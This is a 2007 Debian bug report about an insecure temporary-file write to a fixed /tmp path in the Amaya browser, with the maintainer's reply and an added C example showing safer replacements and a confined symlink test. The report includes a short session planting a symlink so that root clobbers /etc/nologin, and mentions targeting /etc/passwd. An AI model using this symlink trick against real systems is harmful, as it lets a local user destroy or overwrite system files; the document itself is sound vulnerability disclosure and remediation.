Hi Steve, I forwarded it upstream who "fixed" it with the new 9.55 release. Given the progress made with their fix, I will have to work on a proper one...
Many thanks for the report.

Regis

On Tue, July 3, 2007 19:42, Steve Kemp wrote:
> Package: amaya
> Version: 9.54~dfsg.0-1
> Severity: important
>
> The Amaya package contains the following code inside
> amaya-9.51/Amaya/thotlib/unicode/ustring.c
>
>   {
>     int fd;
>     char buffer[256];
>     memset ( buffer, 0, 256 );
>     /* ask the system using locale command */
>     system ("locale -ck LC_MESSAGES | grep messages-codeset | sed 's/.*=\"//' | sed 's/\"//' > /tmp/locale");
>     fd = open ("/tmp/locale", O_RDONLY);
>
> This can be abused to allow arbitrary files to be created, or truncated,
> when a user runs the browser as this session shows:
>
>   # check there are no files, then create an evil symlink
>   [EMAIL PROTECTED]:~$ ls -l /etc/nologin /tmp/locale
>   ls: /etc/nologin: No such file or directory
>   ls: /tmp/locale: No such file or directory
>   [EMAIL PROTECTED]:~$ ln -s /etc/nologin /tmp/locale
>
>   # wait for root to run the application
>   [EMAIL PROTECTED]:~$ sudo -s
>   [EMAIL PROTECTED]:~# amaya
>
>   # see the file
>   [EMAIL PROTECTED]:~# ls /etc/nologin
>   /etc/nologin
>   [EMAIL PROTECTED]:~# cat /etc/nologin
>   UTF-8
>
> Obviously this example relies upon root to run the application and linking
> to /etc/passwd would trash the system.
>
> I guess the solution is to generate a secure temporary filename with
> mktemp, mkstemp, or similar..
>
> -- System Information:
> Debian Release: lenny/sid
>   APT prefers unstable
>   APT policy: (500, 'unstable')
> Architecture: amd64 (x86_64)
>
> Kernel: Linux 2.6.18-xen (SMP w/2 CPU cores)
> Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/bash
>
> Versions of packages amaya depends on:
> ii  amaya-data               9.54~dfsg.0-1      Web Browser, HTML Editor and Testb
> ii  libc6                    2.5-11             GNU C Library: Shared libraries
> ii  libexpat1                1.95.8-3.4         XML parsing C library - runtime li
> ii  libfreetype6             2.2.1-6            FreeType 2 font engine, shared lib
> ii  libgcc1                  1:4.2-20070627-1   GCC support library
> ii  libgl1-mesa-glx [libgl1  6.5.2-5            A free implementation of the OpenG
> ii  libglu1-mesa [libglu1]   6.5.2-5            The OpenGL utility library (GLU)
> ii  libjpeg62                6b-13              The Independent JPEG Group's JPEG
> ii  libpng12-0               1.2.15~beta5-2     PNG library - runtime
> ii  libraptor1               1.4.15-3           Raptor RDF parser and serializer l
> ii  libstdc++6               4.2-20070627-1     The GNU Standard C++ Library v3
> ii  libwww-ssl0              5.4.0-11           The W3C-WWW library (SSL support)
> ii  libwxbase2.6-0           2.6.3.2.1.5        wxBase library (runtime) - non-GUI
> ii  libwxgtk2.6-0            2.6.3.2.1.5        wxWidgets Cross-platform C++ GUI t
> ii  ttf-freefont             20060501cvs-12     Freefont Serif, Sans and Mono True
> ii  zlib1g                   1:1.2.3.3.dfsg-3   compression library - runtime
>
> Versions of packages amaya recommends:
> pn  amaya-doc                <none>             (no description available)
>
> -- no debconf information
>
> Steve
> --
> # Kink-Friendly Dating
> http://ctrl-alt-date.com/
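The fix Steve suggests, worked through as an added example in C. This is not Amaya's code and not the upstream 9.55 change; the function names and the probe's directory layout are my own. It shows the two defensible replacements for `system("... > /tmp/locale")`: asking the C library for the codeset so that no file is needed at all, and, where a scratch file is unavoidable, letting mkstemp() create it under an unpredictable name with O_EXCL. A third function reproduces the symlink behaviour from the report inside a private directory it creates and removes itself, so the difference between an O_TRUNC open and an O_EXCL open can be observed without touching anything outside that directory.

```c
/* Added example, not Amaya's code: what the report's "mkstemp or similar"
 * looks like in practice, next to the option of needing no file at all. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <langinfo.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1. No shell, no pipeline, no file: the C library already knows the codeset
 *    of the active locale. CODESET comes from LC_CTYPE; with an ordinary
 *    LANG/LC_ALL setting it is the value the quoted
 *    `locale -ck LC_MESSAGES | grep messages-codeset` pipeline extracted.
 *    Returns 0 and fills `out` on success, -1 otherwise. */
int messages_codeset(char *out, size_t outlen)
{
    if (setlocale(LC_ALL, "") == NULL)  /* honour the user's environment */
        setlocale(LC_ALL, "C");         /* or fall back as `locale` would */
    const char *cs = nl_langinfo(CODESET);
    if (cs == NULL || *cs == '\0' || strlen(cs) >= outlen)
        return -1;
    strcpy(out, cs);
    return 0;
}

/* 2. If a scratch file is unavoidable, mkstemp() picks an unpredictable name
 *    and creates it with O_CREAT|O_EXCL and mode 0600, so a link planted at a
 *    guessed name is never opened through. Returns the open fd (or -1) and
 *    leaves the real path in `path` for the caller to unlink later. */
int secure_scratch_file(char *path, size_t pathlen)
{
    const char *dir = getenv("TMPDIR");
    if (dir == NULL || *dir == '\0')
        dir = "/tmp";
    if (snprintf(path, pathlen, "%s/locale.XXXXXX", dir) >= (int)pathlen)
        return -1;
    return mkstemp(path);
}

/* 3. Probe, confined to a fresh mkdtemp() directory: "locale" is a symlink to
 *    "victim". The shell's `> /tmp/locale` is an open() with O_TRUNC and no
 *    O_EXCL, which follows the link and empties victim; the same open() with
 *    O_CREAT|O_EXCL is refused with EEXIST whether or not the name is a link.
 *    Returns 1 if both behaviours are observed, 0 if not, -1 on setup error. */
int symlink_probe(void)
{
    const char *tmp = getenv("TMPDIR");
    char dir[256], victim[300], link[300];
    struct stat st;
    int fd, followed = 0, refused = 0, result = -1;

    if (tmp == NULL || *tmp == '\0')
        tmp = "/tmp";
    if (snprintf(dir, sizeof dir, "%s/probe.XXXXXX", tmp) >= (int)sizeof dir)
        return -1;
    if (mkdtemp(dir) == NULL)           /* private 0700 directory */
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/locale", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "secret", 6) != 6 || close(fd) != 0)
        goto out;
    if (symlink(victim, link) != 0)
        goto out;

    /* unsafe, as in the report: the link is followed and victim truncated */
    fd = open(link, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd >= 0) {
        followed = (fstat(fd, &st) == 0 && st.st_size == 0);
        close(fd);
    }

    /* safe: O_EXCL fails on any existing name, including a symlink */
    fd = open(link, O_WRONLY | O_CREAT | O_EXCL, 0600);
    refused = (fd < 0 && errno == EEXIST);
    if (fd >= 0)
        close(fd);

    result = (followed && refused) ? 1 : 0;
out:
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    char cs[64];
    if (messages_codeset(cs, sizeof cs) == 0)
        printf("codeset via nl_langinfo: %s\n", cs);
    printf("probe: %d (1 = O_TRUNC followed the link, O_EXCL refused it)\n",
           symlink_probe());
    return 0;
}
```

Of the two replacements, the first is preferable: it removes the shell invocation along with the temporary file, so there is nothing left in /tmp for a local user to pre-create. mkstemp() is the right tool only when the data genuinely has to pass through a file; even then the caller should keep the descriptor it was handed rather than reopening the file by name.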